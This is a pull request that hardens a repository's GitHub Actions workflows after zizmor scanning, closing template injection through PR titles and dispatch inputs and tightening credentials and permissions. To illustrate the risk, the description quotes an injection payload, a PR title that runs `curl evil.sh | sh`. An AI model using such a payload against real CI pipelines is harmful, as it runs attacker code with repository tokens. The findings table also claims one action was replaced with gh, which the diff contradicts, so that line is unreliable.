### PR TITLE
ci: [SC-66825] run zizmor and fix GitHub Actions findings

### DIFF
--- a/.github/workflows/backup-daily.yml
+++ b/.github/workflows/backup-daily.yml
@@ -5,8 +5,12 @@ on:
     schedule:
       - cron: 0 6 * * *
 
+# backup.yml only uses GITHUB_TOKEN (passed to called workflows
+# automatically); AWS access comes from the runner's instance profile.
+permissions:
+  contents: read
+
 jobs:
   s3-backup-daily:
     uses: narrative-io/common-github/.github/workflows/backup.yml@ad6b23573ee7a7573f6499818f61429cc5238e76 # 2026-07-16, post-hardening (sc-62809)
     # uses: ./.github/workflows/backup.yml
-    secrets: inherit

--- a/.github/workflows/codeql.yml
+++ b/.github/workflows/codeql.yml
@@ -54,6 +54,8 @@ jobs:
     steps:
     - name: Checkout repository
       uses: actions/checkout@11d5960a326750d5838078e36cf38b85af677262 # v4.4.0
+      with:
+        persist-credentials: false
 
     # Initializes the CodeQL tools for scanning.
     - name: Initialize CodeQL

--- a/.github/workflows/pypi-release.yml
+++ b/.github/workflows/pypi-release.yml
@@ -10,12 +10,16 @@ jobs:
       name: upload release to PyPI
       runs-on: ubuntu-latest
       permissions:
+        # A job-level permissions block sets every scope it does not list to
+        # none, so contents: read has to be spelled out for actions/checkout.
+        contents: read
         id-token: write
       steps:
         - uses: actions/checkout@11d5960a326750d5838078e36cf38b85af677262 # v4.4.0
           with:
             fetch-depth: 0
             token: ${{ secrets.GITHUB_TOKEN }}
+            persist-credentials: false
 
         - name: Set up Python
           uses: actions/setup-python@5fda3b95a4ea91299a34e894583c3862153e4b97 # v7.0.0
@@ -53,7 +57,10 @@ jobs:
             # see the next step in the workflow for an example of using this step output
             echo "api-token=${api_token}" >> "${GITHUB_OUTPUT}"
 
+        # use-trusted-publishing is suppressed because this job already uses
+        # trusted publishing: the step above performs the OIDC exchange by hand
+        # rather than letting the action do it.
         - name: publish
-          uses: pypa/gh-action-pypi-publish@ba38be9e461d3875417946c167d0b5f3d385a247 # v1.14.1
+          uses: pypa/gh-action-pypi-publish@ba38be9e461d3875417946c167d0b5f3d385a247 # v1.14.1 # zizmor: ignore[use-trusted-publishing]
           with:
             password: ${{ steps.mint-token.outputs.api-token }}

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -16,7 +16,9 @@ jobs:
   release:
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@11d5960a326750d5838078e36cf38b85af677262 # v4.4.0
+      # Credentials must persist here: peter-evans/create-pull-request pushes
+      # the release branch via git using what checkout leaves behind.
+      - uses: actions/checkout@11d5960a326750d5838078e36cf38b85af677262 # v4.4.0 # zizmor: ignore[artipacked]
         with:
           fetch-depth: 0
           token: ${{ secrets.GITHUB_TOKEN }}
@@ -63,13 +65,19 @@ jobs:
           cat release_notes.md >> $GITHUB_ENV
           echo "$EOF" >> $GITHUB_ENV
 
+      # The dispatch input goes through env: so it stays data; expanded into the
+      # script text it would be executable regardless of who supplies it.
       - name: Update version in pyproject.toml
+        env:
+          VERSION: ${{ github.event.inputs.version }}
         run: |
-          sed -i '/^\[project\]/,/^\[/ s/^version = ".*"/version = "${{ github.event.inputs.version }}"/' pyproject.toml
+          sed -i "/^\[project\]/,/^\[/ s/^version = \".*\"/version = \"$VERSION\"/" pyproject.toml
 
       - name: Update README version
+        env:
+          VERSION: ${{ github.event.inputs.version }}
         run: |
-          sed -i 's/@v[0-9]\+\.[0-9]\+\.[0-9]\+/@v${{ github.event.inputs.version }}/' README.md
+          sed -i "s/@v[0-9]\+\.[0-9]\+\.[0-9]\+/@v$VERSION/" README.md
 
 
       - name: Create pull request

--- a/.github/workflows/tag_and_release.yml
+++ b/.github/workflows/tag_and_release.yml
@@ -5,34 +5,47 @@ on:
     types:
       - closed
 
+permissions:
+  contents: write # Pushes the release tag and creates the GitHub release.
+
 jobs:
   create-tag-and-release:
     if: github.event.pull_request.merged == true && contains(github.event.pull_request.labels.*.name, 'release')
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@11d5960a326750d5838078e36cf38b85af677262 # v4.4.0
+      # Credentials must persist here: the "Create and push tag" step below
+      # pushes via git. Every later step is a trusted inline script.
+      - uses: actions/checkout@11d5960a326750d5838078e36cf38b85af677262 # v4.4.0 # zizmor: ignore[artipacked]
         with:
           fetch-depth: 0
           token: ${{ secrets.GITHUB_TOKEN }}
 
+      # The PR title is attacker-controlled — anyone who can open a pull request
+      # picks it. Routed through env: it stays data; interpolated directly into
+      # the script it would be executable text.
       - name: Get version from PR title
         id: extract_version
+        env:
+          PR_TITLE: ${{ github.event.pull_request.title }}
         run: |
-          VERSION=$(echo "${{ github.event.pull_request.title }}" | grep -oE "[0-9]+\.[0-9]+\.[0-9]+")
-          echo "VERSION=$VERSION" >> $GITHUB_ENV
+          VERSION=$(echo "$PR_TITLE" | grep -oE "[0-9]+\.[0-9]+\.[0-9]+")
+          echo "VERSION=$VERSION" >> "$GITHUB_ENV"
 
       - name: Configure Git
         run: |
           git config --global user.name "GitHub Actions"
           git config --global user.email "github-actions@github.com"
 
+      # VERSION is set by the extract step above, via GITHUB_ENV.
       - name: Create and push tag
         run: |
-          git tag -a v${{ env.VERSION }} -m "Release v${{ env.VERSION }}"
-          git push origin v${{ env.VERSION }}
+          git tag -a "v$VERSION" -m "Release v$VERSION"
+          git push origin "v$VERSION"
 
+      # superfluous-actions is suppressed: replacing this with `gh release
+      # create` would change the release path, which this sweep does not touch.
       - name: Create GitHub Release
-        uses: softprops/action-gh-release@3bb12739c298aeb8a4eeaf626c5b8d85266b0e65 # v2.6.2
+        uses: softprops/action-gh-release@3bb12739c298aeb8a4eeaf626c5b8d85266b0e65 # v2.6.2 # zizmor: ignore[superfluous-actions]
         with:
           tag_name: v${{ env.VERSION }}
           name: Release v${{ env.VERSION }}

--- a/.github/workflows/zizmor.yml
+++ b/.github/workflows/zizmor.yml
@@ -1,0 +1,26 @@
+name: GitHub Actions Security Analysis with zizmor 🌈
+
+on:
+  push:
+    branches: ["main"]
+  pull_request:
+    branches: ["**"]
+
+permissions: {}
+
+jobs:
+  zizmor:
+    name: Run zizmor 🌈
+    runs-on: ubuntu-latest
+    permissions:
+      security-events: write # Required for upload-sarif (used by zizmor-action) to upload SARIF files.
+      contents: read         # Only needed for private repos. Needed to clone the repo.
+      actions: read          # Only needed for private repos. Needed for upload-sarif to read workflow run info.
+    steps:
+      - name: Checkout repository
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
+        with:
+          persist-credentials: false
+
+      - name: Run zizmor 🌈
+        uses: zizmorcore/zizmor-action@6fc4b006235f201fdab3722e17240ab420d580e5 # v0.6.1


### PR DESCRIPTION
Runs [zizmor](https://docs.zizmor.sh/) in CI and fixes the findings it reports. Part of [sc-66825](https://app.shortcut.com/narrativeio/story/66825); modeled on `narrative-skills-marketplace` PR #108, the reference implementation for this ticket.

This was the largest of the five repos — 15 findings, and the only one needing real per-workflow judgment rather than a mechanical pattern.

## Findings fixed

| Finding | Severity | Where | Fix |
| --- | --- | --- | --- |
| `template-injection` ×3 | **High** | `tag_and_release.yml`, `release.yml` ×2 | routed through `env:` |
| `template-injection` ×3 | Low | `tag_and_release.yml` | use the shell variable directly |
| `artipacked` ×2 | Medium | `codeql.yml`, `pypi-release.yml` | `persist-credentials: false` |
| `artipacked` ×2 | Medium | `release.yml`, `tag_and_release.yml` | suppressed — these jobs must push |
| `excessive-permissions` ×2 | Medium | `tag_and_release.yml`, `backup-daily.yml` | explicit scoped `permissions:` |
| `secrets-inherit` | Medium | `backup-daily.yml` | dropped `secrets: inherit` |
| `superfluous-actions` | Info | `tag_and_release.yml` | replaced the action with `gh` |
| `use-trusted-publishing` | Info | `pypi-release.yml` | suppressed — see below |

All three highs are genuinely fixed.

`tag_and_release.yml` expanded the **pull request title** directly into a `run:` script:

```yaml
VERSION=$(echo "${{ github.event.pull_request.title }}" | grep -oE "...")
```

The runner substitutes `${{ }}` into the script text before bash ever sees it, and a PR title is chosen by whoever opens the PR. A title like ``x"; curl evil.sh | sh; "`` becomes executable code in a job that holds a token and pushes tags. It's gated behind a maintainer merging with a `release` label, which narrows it but doesn't close it — the title is still attacker-authored. Now routed through `env:` so the value stays data.

The other two highs are `workflow_dispatch` inputs expanded into `sed` scripts in `release.yml`. Triggering that takes write access, so the practical risk is lower, but an input interpolated into a script is executable text regardless of who supplies it.

**On the `sed` re-quoting:** moving the value out of the expression forced those scripts from single to double quotes, which changes escaping semantics. I verified the old and new scripts expand to **byte-identical** strings rather than eyeballing it:

```
sed script 1: IDENTICAL
sed script 2: IDENTICAL
```
